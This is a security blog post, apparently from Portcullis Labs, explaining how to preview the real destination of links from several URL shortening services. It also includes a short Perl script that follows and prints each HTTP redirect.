It’s worth noting that there are numerous browser extensions that will attempt to lengthen short URLs in-situ. While this is probably works well most of the time, it could be open to exploitation (if the extension is coded badly) or subversion. One piece of functionality I’ve seen in such an extension was to replace the link with the meta data title for the page. This doesn’t really help if the link leads you to a convincing looking phishing site, complete with fake meta-data.

I’ve picked out a sample of what seem to be the most popular shortening services. They are (in no particular order):

  • bit.ly
  • tinyurl.com
  • goo.gl
  • is.gd
  • tiny.cc
  • ow.ly

I’ve come up with this list as a result of a quick search and those I’ve had previous experience with. There are a couple of notable exclusions from the list such as t.co and fb.me, the services run by Twitter and Facebook respectively. I’ve excluded these (as well as others) as they’re only used by themselves.

Twitter’s shortener, t.co, is only accessible when using twitter it seems and doesn’t provide any kind of dedicated front-end to view information for a given link. It does however replace some of the text in-line and provides the original URL in the link title which you can see by hovering over the URL.
Facebook’s version seems a little… undocumented. I couldn’t find a great deal of information on it other than it seems to be used largely for mobile users and (from what little I checked) is only used for linking back to Facebook. One feature I did find however was that it can be used to link to any Facebook page given its alias. For example, fb.me/PortcullisCSL.

I’ve also only chosen services which are free to use and for obvious reasons I’m excluding any that you can create using your own domain (Coke has one for example – cokeurl.com).

For this post, we’re going to use https://labs.portcullis.co.uk as our long URL to put through the shorteners.

Here’s a list of how our shortened links come out and the associated ways of previewing the actual destination:

Service Short link Preview link
bit.ly http://bit.ly/2cx5kA http://bit.ly/2cx5kA+
tinyurl.com http://tinyurl.com/nt79ln4 http://preview.tinyurl.com/nt79ln4
goo.gl http://goo.gl/cgc0Wb http://goo.gl/#analytics/goo.gl/cgc0Wb/all_time
is.gd http://is.gd/ObGfiX http://is.gd/ObGfiX-
tiny.cc http://tiny.cc/43z67w http://tiny.cc/43z67w~
ow.ly http://ow.ly/rObWZ Couldn’t find a way to expand the URL.

In summary; bit.ly, is.gd and tiny.cc all have nice simple ways of taking a look, you just have to add a character onto the end (providing you pick the right one). Google’s service seems like the most complicated requiring the knowledge of the correct runes, and I couldn’t find a way to preview ow.ly.

When writing this post, I was pointed at a bit of quick Perl that Tim wrote a little while ago to assist in a test which will follow a short link and print out each redirect it encounters along the way. This is particularly useful if your chosen link leads you to yet another URL shortener service.

#!/usr/bin/perl

use strict;
use LWP;

my $url;
my $redirectflag;
my $httphandle;
my $requesthandle;
my $responsehandle;

sub usage {
        die "usage: " . basename($0) . " ";
}

if (@ARGV != 1) {
        usage();
}
$url = shift;
$httphandle = LWP::UserAgent->new(max_redirect => 0);
$httphandle->agent("Mozilla/5.0 (compatible; resolveurl.pl 0.1)");
$redirectflag = 1;
while ($redirectflag == 1) {
        $redirectflag = 0;
        $requesthandle = HTTP::Request->new(HEAD => $url);
        $responsehandle = $httphandle->request($requesthandle);
        if ($responsehandle->is_redirect) {
                $url = $responsehandle->header("location");
                print $url . "\n";
                $redirectflag = 1;
        }
}

Lastly, I’ve decided to make a quick mention of adf.ly which was pointed out to me by a colleague. This is a service for presenting ads before sending users onto the end URL. From a quick look, there didn’t appear any way in which to preview the URL you were being sent to. Given that following one of their links will present you with a third party ad could have its own implications. But that’s for another post.

The post URL shorteners: What link are you really clicking? appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/feed/ 0